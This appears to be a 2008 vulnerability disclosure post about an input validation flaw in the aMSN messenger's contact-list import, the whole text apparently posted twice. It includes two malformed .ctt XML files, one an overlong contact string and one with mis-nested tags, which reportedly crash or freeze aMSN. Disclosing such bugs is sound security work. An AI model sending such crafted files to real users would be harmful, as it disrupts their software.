evilcry
February 1st, 2008, 03:20
Risk: Low
Tipology: Input Validation Error
All aMSN versions, both on Windows and Linux platorms.
As Microsoft MSN, aMSN have a nice feature for Exporting and Importing the list of
contacts you have.
This list is dumped into an XML file (file extension .ctt), with this structure
——————————————————————-
<?xml version=”1.0″?>
<messenger>
<service name=”.NET Messenger Service”>
<contactlist>
<contact> your_contact@xxxx.yy ("your_contact@xxxx.yy")</contact>
</contactlist>
</service>
</messenger>
——————————————————————–
aMSN does not Validate correctly the Contacts you insert, precisely does not parse
the format of this file, and suddenly when you import a malformed Contact List it
shutdown
here an example of malformed input list
——————————————————————-
<?xml version=”1.0″?>
<messenger>
<service name=”.NET Messenger Service”>
<contactlist>
<contact>AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAA@xxxx.yy ("AAAAAAAAAAAAAAAAAAAAAAA@xxxx.yy")</contact>
</contactlist>
</service>
</messenger>
——————————————————————-
Or another possibility
——————————————————————-
<?xml version=”1.0″?>
<messenger>
<service name=”.NET Messenger Service”>
<contactlist>
<contact><contact><contact><contact>
<contact></contact></contact><contact>
</contact></contact></contact></contact>
</contact>
</contactlist>
</service>
</messenger>
——————————————————————-
This will cause a freeze of aMSN..
If you use the same “trick” with Ms Messenger, a MessageBox will advice you of the malformed
file
See you to the next post
Tipology: Input Validation Error
All aMSN versions, both on Windows and Linux platorms.
As Microsoft MSN, aMSN have a nice feature for Exporting and Importing the list of
contacts you have.
This list is dumped into an XML file (file extension .ctt), with this structure
——————————————————————-
<?xml version=”1.0″?>
<messenger>
<service name=”.NET Messenger Service”>
<contactlist>
<contact> your_contact@xxxx.yy ("your_contact@xxxx.yy")</contact>
</contactlist>
</service>
</messenger>
——————————————————————–
aMSN does not Validate correctly the Contacts you insert, precisely does not parse
the format of this file, and suddenly when you import a malformed Contact List it
shutdown
here an example of malformed input list
——————————————————————-
<?xml version=”1.0″?>
<messenger>
<service name=”.NET Messenger Service”>
<contactlist>
<contact>AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAA@xxxx.yy ("AAAAAAAAAAAAAAAAAAAAAAA@xxxx.yy")</contact>
</contactlist>
</service>
</messenger>
——————————————————————-
Or another possibility
——————————————————————-
<?xml version=”1.0″?>
<messenger>
<service name=”.NET Messenger Service”>
<contactlist>
<contact><contact><contact><contact>
<contact></contact></contact><contact>
</contact></contact></contact></contact>
</contact>
</contactlist>
</service>
</messenger>
——————————————————————-
This will cause a freeze of aMSN..
If you use the same “trick” with Ms Messenger, a MessageBox will advice you of the malformed
file
See you to the next post
